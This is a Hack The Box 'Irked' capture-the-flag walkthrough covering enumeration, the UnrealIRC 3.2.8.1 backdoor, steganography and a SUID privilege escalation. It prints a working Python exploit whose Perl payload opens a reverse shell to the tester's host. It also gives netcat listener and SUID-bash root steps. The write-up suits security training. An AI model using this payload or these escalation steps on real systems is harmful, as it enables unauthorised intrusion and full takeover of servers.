data:image/s3,"s3://crabby-images/db3bc/db3bc5ab8fdee957ec79e60b0e6147736d0196c8" alt=""
Hack The Box – Irked Walkthrough
Introduction
This was an easy Linux box that involved exploiting a vulnerability that allowed to remotely download and execute files to gain initial access, using Steganography to escalate to the mardov user and exploiting a custom SUID binary to gain root access.
Enumeration
The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
data:image/s3,"s3://crabby-images/2a61a/2a61a0aa56964d73f90f11c4312d3399f968699f" alt=""
When running a scan using the -p- flag to scan all ports, port 8067 is found:
data:image/s3,"s3://crabby-images/04c69/04c69b6b83adaa1e3bc8c72f5af8ecec7ace6f16" alt=""
Enumerating Port HTTP
The webserver’s home page shows the below and after running a few scans to find hidden files and directories nothing useful was found:
data:image/s3,"s3://crabby-images/a0997/a0997ca8ba6a430a236da67eb1948e17a53dcea2" alt=""
Enumerating IRC
IRC is a layer protocol that used to create chat clients/servers. This box uses UnrealIRC for this service. When searching for public exploits with SerachSploit, a few come up:
data:image/s3,"s3://crabby-images/adbe6/adbe64bb6ee5d192418b4e8833e63a83928fd492" alt=""
The above did not seem to work, so after some research, this GitHub repository had a useful script to exploit this vulnerability:
data:image/s3,"s3://crabby-images/a224f/a224fac028271975e00d09016884e45062565261" alt=""
Exploiting in UnrealIRC 3.2.8.1
After cloning the repository, updating local and remote IP address/port
import socket
#target ip and port
ip="10.10.10.117"
port=8067
##################
print ("MADE BY :- SARTHAK")
print(" Referenced by:- Metasploit source code")
print("NOTE:-I MADE THIS DUE TO PEOPLE PREPARING FOR OSCP WANT TO DO EXPLOITATION MANUALLY AS WELL AS THE EXPLOIT-DB EXPLOIT DOESN'T SEEM TO BE WORKING IDK WHY :(\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,port))
a=s.recv(1024)
print "Sending payload baby :)"
#replace the ip and port with yours ...(YOUR IP AND PORT)
a="AB;perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"10.10.14.8:443\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'"
s.sendall(a)
print("Eyes on netcat sire 10...9...8...7...6...5..4..3...2..1..HAHA IT WILL COME :)")
The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
data:image/s3,"s3://crabby-images/68ee4/68ee4e1c1a2208df4e96b8b218efe0e060bfb7f6" alt=""
After running the script, a callback granting a reverse shell is received:
data:image/s3,"s3://crabby-images/ab8a1/ab8a19d8e33783e5b4eceb39b5ddcec82d75bf03" alt=""
The following steps can be done to obtain an interactive shell:
- Running “python -c ‘import pty; pty.spawn(“/bin/sh”)’” on the victim host
- Hitting CTRL+Z to background the process and go back to our host
- Running “stty raw -echo” on our host
- Hitting “fg + ENTER” to go back to our reverse shell
data:image/s3,"s3://crabby-images/9ec1c/9ec1c326845d566e5fb8b186449c47fcc6f9da3f" alt=""
Privilege Escalation
When inspecting the irc user’s bash history, the Documents folder in the djmardov user’s home directory is mentioned.
data:image/s3,"s3://crabby-images/a3209/a3209e110c745e3b3bd04e8c9d7abc148867fbfc" alt=""
When navigating to the documents folder, a file is found in a hidden folder containing what seems to be a password to be used in steganography:
data:image/s3,"s3://crabby-images/a089e/a089ebbdf1b646c612b79def572d07f5feac4816" alt=""
Downloading the image used in the home page of the web server:
data:image/s3,"s3://crabby-images/deccb/deccb800692c628acabd853363fd604c25bcaf7c" alt=""
Steghide is a steganography program that can hide data in image files. Using steghide to extract information from the image with the password found:
data:image/s3,"s3://crabby-images/c7248/c724838248607960e1dedad52a82acf38c00724d" alt=""
A pass.txt file was extracted. Using the password to login through SSH:
data:image/s3,"s3://crabby-images/007f7/007f799ec302cd98f95b5ecf00c6edb57eb30ee3" alt=""
Listing available SUID binary/commands with the following:
find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o- -perm -2000 -o- -perm -6000
data:image/s3,"s3://crabby-images/6e885/6e8855c570e83c19feed1fcf9d1a64017cae9e6b" alt=""
When running the /usrbin/viewuser binary, it looks like it is trying to execute a listuser file but it cannot find it
data:image/s3,"s3://crabby-images/a83ae/a83ae523169dcb7a583732b83abd7af3283a3244" alt=""
Creating a listuser script that prints user name and id to verify execution.
data:image/s3,"s3://crabby-images/13d28/13d28a1ba4e6cced607f8a5418cb09cf9336b448" alt=""
Executing viewusers – it has been executed as root based on the output below
data:image/s3,"s3://crabby-images/20430/2043074c542c6e87781b609e9f4a2f4d9ed415be" alt=""
Modifying the script to create a suid binary of bash
data:image/s3,"s3://crabby-images/3606e/3606eaff92810977a0babaa733c67077b3e550ac" alt=""
Executing the script and verifying it has created the binary, it is owned by root and it has SUID permission
data:image/s3,"s3://crabby-images/cbf48/cbf48b6389e93297adb4800b9429a70fff430aba" alt=""
After executing the new SUID bash binary with the -p flag, which allows to execute binaries as the owner of it, this grants root access to the host:
data:image/s3,"s3://crabby-images/f3ade/f3adec35c7cf6fd8590f765f4b2b144044ffb6dc" alt=""
Conclusion
This was a very interesting box, even though the SUID privilege escalation part was pretty ordinary, IRC isn’t a service that is seen very often lately and the steganography aspect of it was really unique.